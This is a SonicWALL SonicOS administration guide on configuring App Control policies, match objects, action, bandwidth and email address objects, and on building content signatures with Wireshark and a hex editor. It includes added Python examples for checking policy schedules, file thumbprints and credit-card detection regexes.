Comments – This column is blank unless the following has been configured for the category and/or signature application:
Information icon – Address inclusion/exclusion settings.
Clock icon – Schedule other than Always On.
Configure – Edit icon that displays the appropriate dialog for modifying the signature application settings.

Viewing by All Categories and All Applications by Category

The App Control Advanced table displays the following columns; for a description of what each column displays, see Viewing by All Categories and All Applications by Signatures.

Category, Block, Log, Comments, Configure

Viewing just One Category

You can restrict the App Control Advanced table to display the signature applications of just one category by:

Selecting a category from the Category drop-down menu.
Clicking the category heading, such as APP-UPDATE.

Viewing just One Application

You can restrict the App Control Advanced table to display the signatures of just one application by selecting an application from the Application drop-down menu.

Displaying Details of Signature Applications

You can display details about signature applications by clicking on the name of the signature application. The Applications Details popup dialog displays.

Sig Id – Signature ID.
Category – Category of signature application, such as APP-UPDATE or GAMING.
Technology – Type of software:
Application
Browser
Network Infrastructure
Risk – Level of risk for each signature:
Low (green)
Guarded (blue)
Elevated (yellow)

Clicking the signature ID displays the SonicALERT page for the signature.

Displaying Details of Application Signatures

You can display details about signature applications by clicking on the name of the signature. The App Signature Details popup dialog displays.

Category – Category of signature application, such as APP-UPDATE or GAMING.
App Name – Name of the signature application.
Alert Level – Alert level:
Low
Medium
High
Threat Level – Level of threat of the signature:
Low (green)
Guarded (blue)
Elevated (yellow)

Configuring App Control


Configuring Application Control by Category

Category-based configuration is the most broadly based method of policy configuration on the Firewall > App Control Advanced page. The categories are listed in the Category drop-down menu.

To configure an App Control policy for an application category:
1
Navigate to the Firewall > App Control Advanced page.
2
In the App Control Advanced section, select an application category from the Category drop-down menu. The field’s Configure button becomes active as soon as a category is selected.
3
Click the Configure button. The App Control Category Settings dialog for the selected category displays.

4
To block applications in this category, select Enable in the Block drop-down menu.
5
To create a log entry when applications in this category are detected, select Enable in the Log drop-down menu.
6
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
7
To exclude a specific user or group of users from the selected block or log actions, select a user group or individual user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
8
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
9
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
10
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
11
To specify a delay between log entries for repetitive events, enter the number of seconds for the delay into the Log Redundancy Filter field.
12
Click OK.

Configuring Application Control by Application

Application-based configuration is the middle level of policy configuration on the Firewall > App Control Advanced page, between the category-based and signature-based levels.

This configuration method allows you to create policy rules specific to a single application if you want to enforce the policy settings only on the signatures of this application without affecting other applications in the same category.

To configure an App Control policy for a specific application:
1
Navigate to the Firewall > App Control Advanced page.
2
Under App Control Advanced, select a category from the Category drop-down menu.

3
Select an application in this category from the Application drop-down menu. A Configure button appears to the right of the field as soon as an application is selected.

4
Click the Configure button. The App Control App Settings dialog for the selected application displays.

The fields at the top of the dialog are not editable. These fields display the values for the Application Category and Application Name.

TIP: The following application configuration options default to the current settings of the category to which the application belongs; for example, Use Category Settings (All). To retain this connection to the category settings for any of these fields, leave this selection in place for those fields.
5
To block this application, select Enable in the Block drop-down menu.
6
To create a log entry when this application is detected, select Enable in the Log drop-down menu.
7
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
8
To exclude a specific user or group of users from the selected block or log actions, select a user group or user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
9
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
10
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
11
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
12
To specify a delay between log entries for repetitive events, enter the number of seconds for the delay into the Log Redundancy Filter field.
13
To see detailed information about the application, click the here link in the Note at the bottom of the dialog.
14
Click OK.

Configuring Application Control by Signature

Signature-based configuration is the lowest, most specific, level of policy configuration on the Firewall > App Control Advanced page.

Setting a policy based on a specific signature allows you to configure policy settings for the individual signature without influence on other signatures of the same application.

To configure an App Control policy for a specific signature:
1
Navigate to the Firewall > App Control Advanced page.
2
Under App Control Advanced, select a category from the Category drop-down menu.
3
Select an application in this category from the Application drop-down menu.
4
To display the specific signatures for this application, select Signature in the Viewed by drop-down menu. For example, the FreeStyle gaming application has two signatures.

5
Click the Configure button in the row for the signature you want to work with. The App Control Signature Settings dialog displays.

The fields at the top of the dialog are not editable. These fields display the values for the Signature Category, Signature Name, Signature ID, Priority, and Direction of the traffic in which this signature can be detected.

TIP: The following application configuration options default to the current settings of the category to which the application belongs; for example, Use Category Settings (All). To retain this connection to the category settings for any of these fields, leave this selection in place for those fields.
6
To block this signature, select Enable in the Block drop-down menu.
7
To create a log entry when this signature is detected, select Enable in the Log drop-down menu.
8
To target the selected block or log actions to a specific user or group of users, select a user group or individual user from the Included Users/Groups drop-down menu. Select All to apply the policy to all users.
9
To exclude a specific user or group of users from the selected block or log actions, select a user group or individual user from the Excluded Users/Groups drop-down menu. Select None to apply the policy to all users.
10
To target the selected block or log actions to a specific IP address or address range, select an Address Group or Address Object from the Included IP Address Range drop-down menu. Select All to apply the policy to all IP addresses.
11
To exclude a specific IP address or address range from the selected block or log actions, select an Address Group or Address Object from the Excluded IP Address Range drop-down menu. Select None to apply the policy to all IP addresses.
12
To enable this policy during specific days of the week and hours of the day, select one of the following schedules from the Schedule drop-down menu:
Always on – Enable the policy at all times.
Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
13
To specify a delay between log entries for repetitive events, type the number of seconds for the delay into the Log Redundancy Filter field.
14
To see detailed information about the signature, click the here link in the Note at the bottom of the dialog.
15
Click OK.

Firewall > Match Objects

This section describes how to manually create a match object. For detailed information about match object types, see Match Objects.


Configuring Match Objects

To configure a match object:
1
Navigate to Firewall > Match Objects.

2
Click Add New Match Object. The Add/Edit Match Object dialog displays.

3
In the Object Name field, enter a descriptive name for the object.
4
Select a Match Object Type from the drop-down menu. Your selection here affects the available options in this dialog. See Match Objects for a description of match object types.
5
Select a Match Type from the drop-down menu. The available selections depend on the match object type.
6
For the Input Representation, click:
Alphanumeric to match a text pattern.
Hexadecimal if you want to match binary content.
7
In the Content field, enter the pattern to match.
8
Click Add. The content appears in the List table.

If the Match Type is Regex Match, you can select one of the predefined regular expressions and then click Pick to add it to the List. You can also type a custom regular expression into the Content field, and then click Add to add it to the List.

Alternatively, you can click Load From File to import a list of elements from a text file. Each element in the file must be on a line by itself.

To remove an element from the list, select the element in the List option, and then click Remove. To remove all elements, click Remove All.

9
Repeat Step 6 through Step 8 to add another element to match.
10
Click OK.

Configuring Application List Objects

This section describes how to create an Application List object, which can be used by Application Control policies in the same way as a match object.

For detailed information about application list object types, including information about the Security tab and Category tab, see Application List Objects.

To configure an application list object:
1
Navigate to Firewall > Match Objects.
2
Click the Add Application List Object button. The Create Match Object dialog displays.

You can control which applications are displayed by selecting one or more application categories, threat levels, and technologies. When the application list is reduced to a list that is focused on your preferences, you can select the individual applications for your filter.

3
In the Search field near the top right of the page, optionally enter part of an application name and click the Search icon to search for applications with that keyword in their names.
4
In the Category pane, select the check boxes for one or more application categories.
5
In the Threat Level pane, select the check boxes for one or more threat levels.
6
In the Technology pane, select the check boxes for one or more technologies.
7
Click the plus sign next to each application you want to add to your filter object. To display a description of the application, click its name in the Name column. A Detailed Information pop-up dialog displays with the following information:
Description
Sig ID; you can click this ID to display a SonicWALL SonicAlert
Category
Technology, such as Application or Browser
Risk, with color-coded threat level

As you select the applications for your filter, the plus sign icon becomes a green checkmark icon and the selected applications appear in the Application Group pane on the right. You can edit the list in this field by deleting individual items or by clicking the eraser to delete all items.

8
When finished selecting the applications to include, type in a name for the object in the Match Object Name field.
9
Click the Save Application Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application List. This object can then be selected when creating an App Rules policy.

Firewall > Action Objects

If you do not want one of the predefined actions, you can select one of the configurable actions. The Add/Edit Action Object dialog provides a way to customize a configurable action with text or a URL. The predefined actions plus any configurable actions that you have created are available for selection when you create an App Rules policy. For more information about actions, see Action Objects.

To configure settings for an action:
1
Navigate to Firewall > Action Objects.

2
Click Add New Action Object. The Add/Edit Action Object dialog displays.

3
In the Action Name field, type a descriptive name for the action. The name can be from 1 to 96 characters.
4
In the Action drop-down menu, select the action that you want:
Block SMTP E-Mail - Send Error Reply (default) – Blocks the transfer of an email and returns a custom SMTP reply.
Disable E-Mail Attachment - Add Text – Disables and garbles email attachment and adds custom text at the end of an email.
Email - Add Text – Adds custom text at the end of an email.
FTP Notification Reply – Sends a custom FTP error reply over the FTP control channel without resetting the FTP control channel connection.
HTTP Block Page – Sends a custom HTTP web page with a custom background color.
HTTP Redirect – Redirects a web browser to another web site or web page. A full URI is the preferred method of redirection. For example, to redirect a user to the www.sonicwall.com web site, enter http://www.sonicwall.com in the Content field.
5
In the Content field, enter the text or URL to be used in the action.
6
If HTTP Block Page was selected as the action, the Color drop-down menu displays.

Choose a background color for the block page: White (default), Yellow, Red, or Blue.

7
Optionally, to see a preview of the blocked-page message, click the Preview button. A separate browser dialog displays with the selected background color and text.
8
Click OK.

For information on configuring bandwidth management in an action object, see Bandwidth Management Overview.

Firewall > Address Objects

NOTE: For increased convenience and accessibility, the Address Objects page can be accessed either from Network > Address Objects or Firewall > Address Objects. The page is identical regardless of which tab it is accessed through. For information on configuring Address Objects, see Network > Address Objects.

Firewall > Service Objects

NOTE: For increased convenience and accessibility, the Service Objects page can be accessed either from Firewall > Service Objects or Network > Services. The page is identical regardless of which tab it is accessed through. For information on configuring Service Objects, see Network > Services.

Firewall > Bandwidth Objects


About Advanced Bandwidth Management

Bandwidth management configuration is based on policies which specify bandwidth limitations for traffic classes. A complete bandwidth management policy consists of two parts: a classifier and a bandwidth rule.

A classifier specifies the actual parameters, such as priority, guaranteed bandwidth, and maximum bandwidth, and is configured in a bandwidth object. Classifiers identify and organize packets into traffic classes by matching specific criteria.

For information on using Bandwidth Objects in Access Rules, App Rules, and Action Objects, see Bandwidth Management Overview.

Configuring Bandwidth Objects

To add or configure a bandwidth object:
1
Go to Firewall > Bandwidth Objects.

2
Do one of the following:
Click the Add button to create a new Bandwidth Object.
Click the Configure button for the Bandwidth Object you want to change.

The Add/Edit Bandwidth Object dialog displays.

3
Click the General tab.
4
In the Name box, enter a name for this bandwidth object.
5
In the Guaranteed Bandwidth box, enter the amount of bandwidth that this bandwidth object will guarantee to provide for a traffic class (in kbps or Mbps).
6
In the Maximum Bandwidth box, enter the maximum amount of bandwidth that this bandwidth object will provide for a traffic class. The actual allocated bandwidth may be less than this value when multiple traffic classes compete for shared bandwidth.
7
In the Traffic Priority box, enter the priority that this bandwidth object will provide for a traffic class. The highest priority is 0. The lowest priority is 7. When multiple traffic classes compete for shared bandwidth, classes with the highest priority are given precedence.
8
In the Violation Action box, enter the action that this bandwidth object will provide (delay or drop) when traffic exceeds the maximum bandwidth setting:
Delay – Excess traffic packets are queued and sent when possible.
Drop – Excess traffic packets are dropped immediately.
9
In the Comment box, enter a text comment or description for this bandwidth object.

Firewall > Email Address Objects

You can create email address objects for use with SMTP Client policies. An email address object can be a list of users or an entire domain. For more information about email address objects, see Email Address Objects.

To configure email address object settings:
1
Navigate to Firewall > Email Addr Objects.
2
Click Add New Email Address Object. The Add/Edit Email Addr Object dialog displays.

3
Type a descriptive name for the email address object in the Email User Object Name field.
4
For Match Type, select Exact Match or Partial Match. Use Partial Match when you want to match a domain or any part of the email address that you provide. To match the email address exactly, select Exact Match.

For example, to match on a domain, select Partial Match in the previous step and then type @ followed by the domain name in the Content field, for example, type: @SonicWALL.com. To match on an individual user, select Exact Match in the previous step and then type the full email address in the Content field, for example: jsmith@SonicWALL.com.

Alternatively, you can click Load From File to import a list of elements from a text file. Each element in the file must be on a line by itself.

5
In the Content field, type the content to match.
6
Click Add.
7
Repeat Step 5 and Step 6 until you have added as many elements as you want.

By defining an email address object with a list of users, you can use Application Control to simulate groups.

8
Click OK.

Verifying App Control Configuration

To verify your policy configuration, you can send some traffic that should match your policy. You can use a network protocol analyzer such as Wireshark to view the packets. For information about using Wireshark, see Wireshark.

Be sure to test for both included and excluded users and groups. You should also run tests according to the schedule that you configured, to determine that the policy is in effect when you want it to be. Check for log entries in the Log > Log Monitor page.

The bottom of the Firewall > App Rules page shows the number of policies defined, the number enabled, and the maximum number of policies allowed.
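To plan the schedule tests recommended above, the following added example (not part of the guide) encodes the Schedule drop-down options as listed in the App Control Advanced procedures and compares recorded test results against them. It assumes each window covers start <= t < end (so 17:00 belongs to the evening window, not Work Hours) and that Weekend Hours runs Friday 17:00 through Monday 08:00, as the guide describes.

```python
from datetime import datetime, time

# Weekday numbers as datetime.weekday() returns them: Monday=0 ... Sunday=6.
WEEKDAYS = frozenset({0, 1, 2, 3, 4})
ALL_DAYS = frozenset(range(7))
END_OF_DAY = None  # stands for 24:00, which datetime.time cannot represent

# Every schedule from the Schedule drop-down, as (days, start, end) windows.
# Assumption (not stated in the guide): a window covers start <= t < end.
SCHEDULES = {
    "Always on": [(ALL_DAYS, time(0, 0), END_OF_DAY)],
    "Work Hours": [(WEEKDAYS, time(8, 0), time(17, 0))],
    "M-T-W-T-F 08:00 to 17:00": [(WEEKDAYS, time(8, 0), time(17, 0))],
    "After Hours": [(WEEKDAYS, time(0, 0), time(8, 0)),
                    (WEEKDAYS, time(17, 0), END_OF_DAY)],
    "M-T-W-T-F 00:00 to 08:00": [(WEEKDAYS, time(0, 0), time(8, 0))],
    "M-T-W-T-F 17:00 to 24:00": [(WEEKDAYS, time(17, 0), END_OF_DAY)],
    "SU-S 00:00 to 24:00": [(ALL_DAYS, time(0, 0), END_OF_DAY)],
    # Friday 17:00 through Monday 08:00, as the guide describes Weekend Hours.
    "Weekend Hours": [(frozenset({4}), time(17, 0), END_OF_DAY),
                      (frozenset({5, 6}), time(0, 0), END_OF_DAY),
                      (frozenset({0}), time(0, 0), time(8, 0))],
}


def _in_window(t, start, end):
    """True when start <= t < end; end=None means the window runs to 24:00."""
    return t >= start and (end is END_OF_DAY or t < end)


def policy_active(schedule, when):
    """Return True if a policy using `schedule` is enforced at `when`.

    `when` is a datetime or an ISO 8601 string such as "2024-01-10T09:30".
    """
    if isinstance(when, str):
        when = datetime.fromisoformat(when)
    day, t = when.weekday(), when.time()
    return any(day in days and _in_window(t, start, end)
               for days, start, end in SCHEDULES[schedule])


def check_observations(schedule, observations):
    """Compare test results against the schedule.

    `observations` is a list of (when, matched) pairs recorded while sending
    test traffic: matched=True when the policy fired (a Log Monitor entry, a
    block page). Returns the pairs that disagree with the schedule, so an
    empty list means the policy was in effect exactly when expected.
    """
    return [(when, matched) for when, matched in observations
            if matched != policy_active(schedule, when)]


if __name__ == "__main__":
    # Constructed test results for a policy on the Work Hours schedule.
    results = [
        ("2024-01-10T09:30", True),   # Wednesday, during work hours: expected
        ("2024-01-10T19:00", True),   # Wednesday evening: policy should be off
        ("2024-01-13T11:00", False),  # Saturday: correctly inactive
    ]
    for when, matched in check_observations("Work Hours", results):
        print(f"unexpected result at {when}: matched={matched}")
```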

Useful Tools

This section describes two software tools that can help you use Application Control to the fullest extent. The following tools are described:

Wireshark

Wireshark is a network protocol analyzer that you can use to capture packets from applications on your network. You can examine the packets to determine the unique identifier for an application, which you can use to create a match object for use in an App Rules policy.

Wireshark is freely available at: http://www.wireshark.org

The process of finding the unique identifier or signature of a Web browser is illustrated in the following packet capture sequence.

1
In Wireshark, click Capture > Interfaces to view your local network interfaces.

2
In the Capture Interfaces dialog box, click Capture to start a capture on your main network interface:

3
In the captured output, locate and click the HTTP GET command in the top pane.
4
View the source for it in the center pane. In the source code, locate the line beginning with User-Agent.

5
Scroll to the right to find the unique identifier for the browser. In this case it is Firefox/1.5.0.7.

6
Type the identifier into the Content field in the Match Objects Settings dialog.

7
Click OK to create a match object that you can use in a policy.

Hex Editor

You can use a hexadecimal (hex) editor to view the hex representation of a file or a graphic image. One such hex editor is XVI32, developed by Christian Maas and available at no cost at the following URL:

http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm

For example, if there is a certain graphic contained within all confidential company documents, you could use the hex editor to obtain a unique identifier for the graphic, and then use the identifying hex string to create a match object. You could reference the match object in a policy that blocks the transfer of files with content matching that graphic.

Using the SonicWall graphic as an example, you would take the following steps:

1
Start XVI32 and click File > Open to open the graphic image GIF file.

2
In the left pane, mark the first 50 bytes by selecting Edit > Block <n> chars… and then select the decimal option and type 50 in the space provided. This marks the first 50 bytes of the file, which is usually sufficient to generate a unique thumbprint for use in a custom match object.

Alternatively you can mark the block by using the following sequence:

Click on the first character (#0).
Press Ctrl+B.
Click on the character in position #49.
Press Ctrl+B.

To locate the character in position #49, click on a character in the right pane (the text pane) and then look at the bottom left corner for the decimal address. Try different characters until it shows Adr. dec: 49.

* 
NOTE: You must click on the corresponding location in the left pane before you press Ctrl+B to mark the block.

When the block is marked, it changes to red font. To unmark a block of characters, press Ctrl+U.

3
After you mark the block, click Edit > Clipboard > Copy As Hex String.
4
In Textpad or another text editor, press Ctrl+V to paste the selection and then press Enter to end the line.

This intermediary step is necessary to allow you to remove spaces from the hex string.

5
In Textpad, click Search > Replace to bring up the Replace dialog.
6
Type a space into the Find field and leave the Replace field empty.
7
Click Replace All.

The hex string now represents the 50 marked bytes as 100 hex digits with no spaces between them.

8
Double-click the hex string to select it, then press Ctrl+C to copy it to the clipboard.
9
In SonicOS, navigate to Firewall > Match Objects.
10
Click Add New Match Object. The Add/Edit Match Object Settings dialog displays.
11
Type a descriptive name into the Object Name field.
12
In the Match Object Type drop-down menu, select Custom Object.
13
For Input Representation, select Hexadecimal.
14
In the Content field, press Ctrl+V to paste the contents of the clipboard.
15
Click Add.

16
Click OK.

You now have a Match Object containing a unique identifier for the image. You can create an App Rules policy to block or log traffic that contains the image matched by this Match Object. For information about creating a policy, see Prerequisites to Configuring App Rules Policies.
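Before committing a thumbprint taken from the first 50 bytes of a file, it is worth checking that the window actually distinguishes the file. The following Python is an added example, not part of the SonicOS guide and not a SonicWALL tool: it assembles two constructed GIF-shaped byte strings (structurally plausible, not decodable images) that share a header and palette, takes the same 50-byte window the procedure above uses, and shows that a window covering only the signature, screen descriptor and start of the color table collides with an unrelated file of the same size and palette, while a window taken from the pixel data does not. The helper names, the palette and the sample upload are the author's assumptions.

```python
# Added example: fingerprinting a file with a fixed byte window and
# searching a captured stream for it. Constructed data only; not SonicOS code.

def make_gif_like(width: int, height: int, palette: bytes, pixels: bytes) -> bytes:
    """Assemble a GIF-shaped byte string: signature, logical screen descriptor,
    256-entry global color table, image descriptor, then image data.
    It has the right layout for this demo but is not a decodable image."""
    if len(palette) != 768:                      # 256 RGB triplets
        raise ValueError("palette must be 768 bytes")
    lsd = (width.to_bytes(2, "little") + height.to_bytes(2, "little")
           + bytes([0xF7, 0x00, 0x00]))          # packed byte: global table, 256 colors
    image_desc = b"\x2c" + b"\x00" * 8 + b"\x00" # image descriptor, no local table
    return b"GIF89a" + lsd + palette + image_desc + pixels + b"\x3b"

def thumbprint(data: bytes, offset: int = 0, length: int = 50) -> str:
    """Hex string (no spaces) of `length` bytes starting at `offset`, i.e. what
    XVI32's 'Copy As Hex String' yields once the spaces are stripped."""
    window = data[offset:offset + length]
    if len(window) < length:
        raise ValueError("file shorter than the requested window")
    return window.hex()

def stream_contains(stream: bytes, hex_thumbprint: str) -> bool:
    """Does a captured payload contain the fingerprinted bytes?
    Mirrors a Custom Object with Hexadecimal input representation."""
    return bytes.fromhex(hex_thumbprint) in stream

# Constructed samples: same dimensions and palette, different pixel data.
PALETTE = bytes(range(256)) * 3              # 768 bytes shared by both files
LOGO = make_gif_like(64, 64, PALETTE, b"\x08\x02\x04\x01\x00LOGO-PIXELS" * 8)
OTHER = make_gif_like(64, 64, PALETTE, b"\x08\x02\x04\x01\x00other-data!" * 8)

HEADER_WINDOW = 0                            # the guide's choice: first 50 bytes
PIXEL_WINDOW = 6 + 7 + 768 + 10              # first byte after the image descriptor

def header_thumbprints_collide() -> bool:
    """Two different files, one thumbprint: a false positive in waiting."""
    return thumbprint(LOGO, HEADER_WINDOW) == thumbprint(OTHER, HEADER_WINDOW)

def pixel_thumbprints_collide() -> bool:
    """A window over image data separates the two files."""
    return thumbprint(LOGO, PIXEL_WINDOW) == thumbprint(OTHER, PIXEL_WINDOW)

# A constructed HTTP upload body carrying the logo.
UPLOAD = b"POST /upload HTTP/1.1\r\nHost: files.example.com\r\n\r\n" + LOGO

if __name__ == "__main__":
    print("header window collides:", header_thumbprints_collide())
    print("pixel window collides:", pixel_thumbprints_collide())
    print("upload matched by pixel thumbprint:",
          stream_contains(UPLOAD, thumbprint(LOGO, PIXEL_WINDOW)))
```

For a real graphic, compare the candidate hex string against a few other images produced by the same tool at the same size; if it also matches those, move the window further into the file or lengthen it.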

App Control Use Cases

Application Control provides the functionality to handle several types of access control very efficiently. The following use cases are presented in this section:

Creating a Regular Expression in a Match Object

Predefined regular expressions can be selected during configuration, or you can configure a custom regular expression. This use case describes how to create a Regex Match object for a credit card number, while illustrating some common errors.

For example, a user creates a Regex Match object for a credit card number, with the following inefficient and also slightly erroneous construction:

[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}

Using this object, the user attempts to build a policy. After the user clicks OK, the appliance displays a “Please wait…” message, but the management session is unresponsive for a very long time and the regular expression may eventually be rejected.

This behavior occurs because, in custom object and file content match objects, regular expressions are implicitly prefixed with a dot asterisk (.*). A dot matches any of the 256 possible byte values except '\n'. The implicit wildcard prefix, the match object type used, and the nature of the regular expression in combination cause the control plane to take a long time to compile the required data structures.

The fix for this is to prefix the regular expression with '\D'. The credit card number must then be preceded by a non-digit character, which gives the expression a definite first character class instead of letting the implicit .* run straight into the digit classes, and which also makes the match more accurate.

Additionally, the regular expression shown above does not accurately represent the intended credit card number. The regular expression in its current form can match several false positives, such as 1234 12341234 1234. A more accurate representation is the following:

\D[1-9][0-9]{3} [0-9]{4} [0-9]{4} [0-9]{4}

or

\D[1-9][0-9]{3}[0-9]{4}[0-9]{4}[0-9]{4}

which can be written more concisely as:

\D\z\d{3}( \d{4}){3}

or

\D\z\d{3}(\d{4}){3}

respectively. Here \z is the SonicOS shorthand for a non-zero digit, [1-9], and \d stands for any digit, [0-9].

These can be written as two regular expressions within one match object or can be further compressed into one regular expression such as:

\D\z\d{3}(( \d{4}){3}|(\d{12}))

You can also capture credit card numbers with digits separated by a '-' with the following regular expression:

\D\z\d{3}(( \d{4}){3}|(-\d{4}){3}|(\d{12}))

The leading '\D' should be included in all of these regular expressions.
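The difference between the loose first attempt and the tightened forms is easiest to see by running both over sample text. The following Python is an added example, not part of the SonicOS guide: it reproduces the guide's expressions in Python syntax (Python has no \z, so the non-zero digit class is written out as [1-9]) and runs them over constructed strings, including the guide's own false positive. It cannot reproduce the appliance's compile-time behaviour, only what each expression matches. The BOUNDED pattern, the sample strings and the function name are the author's additions.

```python
import re
from typing import List

# Added example: what each credit-card regex from the guide actually matches.

# The guide's loose first attempt: optional spaces, nothing anchoring the start.
LOOSE = re.compile(r"[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}")

# The guide's final form: a non-digit must precede the number, and the
# separators are all spaces, all dashes, or absent. \z became [1-9].
CARD = r"[1-9]\d{3}(?:(?: \d{4}){3}|(?:-\d{4}){3}|\d{12})"
STRICT = re.compile(r"\D(" + CARD + r")")

# Added refinement (not in the guide): also refuse a digit immediately after
# the number, so an 18-digit identifier is not cut down to a 16-digit "card".
BOUNDED = re.compile(r"\D(" + CARD + r")(?!\d)")

def find_cards(pattern: re.Pattern, text: str) -> List[str]:
    """Return the card-number candidates `pattern` finds in `text`."""
    return [m.group(1) if pattern.groups else m.group(0)
            for m in pattern.finditer(text)]

# Constructed test strings, not captured traffic.
SAMPLES = {
    "spaced":    "Card: 4111 1111 1111 1111 exp 12/27",
    "dashed":    "Card: 4111-1111-1111-1111",
    "compact":   "Card: 4111111111111111",
    "mixed_bad": "ref 1234 12341234 1234",     # the guide's false positive
    "long_run":  "id 123456789012345678",      # 18-digit identifier, not a card
    "at_start":  "4111 1111 1111 1111 is my card",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name:10} loose={find_cards(LOOSE, text)} "
              f"strict={find_cards(STRICT, text)} bounded={find_cards(BOUNDED, text)}")
```

Two results are worth noting. The leading \D means a number sitting at the very first byte of the scanned data is not matched, which is rarely a problem in a file or a TCP stream but is visible in the at_start sample. And the guide's \d{12} alternative still accepts the first 16 digits of a longer run, which is why the added trailing lookahead is useful where the regex engine supports it.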

Policy-Based Application Control

The SonicWALL application signature databases are part of the Application Control feature, allowing very granular control over policy configuration and actions relating to them. These signature databases are used to protect users from application vulnerabilities as well as worms, Trojans, peer-to-peer transfers, spyware and back-door exploits. The extensible signature language used in the SonicWALL Reassembly Free Deep Packet Inspection engine also provides proactive defense against newly discovered application and protocol vulnerabilities.

To create an Application Control policy:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.

3
Give the Match Object a descriptive name in the Object Name field.
4
Create a match object of type Application Signature List or Application Signature Category List by selecting either option from the Match Object Type drop-down menu. These two types allow for selection of either general application categories or individual application signatures.

5
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy Dialog displays.
8
Create a new App Rules policy of type App Control Content that uses the match object.

9
Click OK.

Logging Application Signature-Based Policies

As with other match object policy types, logging can be enabled on application content policies. By default, these logs are displayed in the standard format, showing the Application Control policy that triggered the alert/action. To obtain more detail about the log event, select the Log using App Control message format check box in the App Control Policies Settings screen for that policy.

Compliance Enforcement

Many businesses and organizations need to ensure compliance with their policies regarding outbound file transfer. Application Control provides this functionality in HTTP, FTP, POP3, and SMTP contexts. This can help companies meet regulatory requirements such as HIPAA, SOX, and PCI. See SonicOS Provides Compliance Enforcement.

SonicOS Provides Compliance Enforcement

When you configure the policy or policies for this purpose, you can select Direction > Basic > Outgoing to specifically apply your file transfer restrictions to outbound traffic. Or, you can select Direction > Advanced and then specify the exact zones between which to prevent file transfer. For example, you can specify LAN to WAN, LAN to DMZ, or any other zones that you have defined.

Server Protection

Servers are typically accessed by many untrusted clients. For best protection of these valuable resources, you should have multiple lines of defense. With Application Control on your gateway, you can configure policies to protect your servers. For example, you can create a policy that blocks all FTP put commands to prevent anyone from writing a file to a server (see Blocking FTP Commands). Even though the server itself may be configured as read-only, this adds a layer of security that you control. Your server is still protected even if its configuration is changed by an error, a side-effect of a patch, or by someone with malicious intent. With Application Control, you can effectively control content upload for servers using HTTP, SMTP, POP3, and FTP. See Application Control Controlling Content Upload.

Application Control Controlling Content Upload

An example of policies that affect servers might be a small ISP providing three levels of service to its customers, whose servers are sitting in its rack. At the gold level, a customer can host a Web server, Email server, and FTP server. At the silver level, a customer can host only a Web server and Email server. At the bronze level, the hosting package only allows a Web server. The ISP could use Application Control to enforce these restrictions, by creating a policy for each customer.

Hosted Email Environments

A hosted email environment is one in which email is available on a user’s Internet Service Provider (ISP). Typically, POP3 is the protocol used for email transfer in this environment. Many small-business owners use this model, and would like to control email content as well as email attachments. Running Application Control on the gateway provides a solution for controlling POP3-based as well as SMTP-based email.

Application Control can also scan HTTP, which is useful for email hosted by sites such as Yahoo or Hotmail. Note that when an attachment is blocked while using HTTP, Application Control does not provide the file name of the blocked file. You can also use Application Control to control FTP when accessing database servers.

If you want a dedicated SMTP solution, you can use SonicWALL Email Security. Email Security is used by many larger businesses for controlling SMTP-based email, but it does not support POP3. For controlling multiple email protocols, Application Control provides an excellent solution.

Email Control

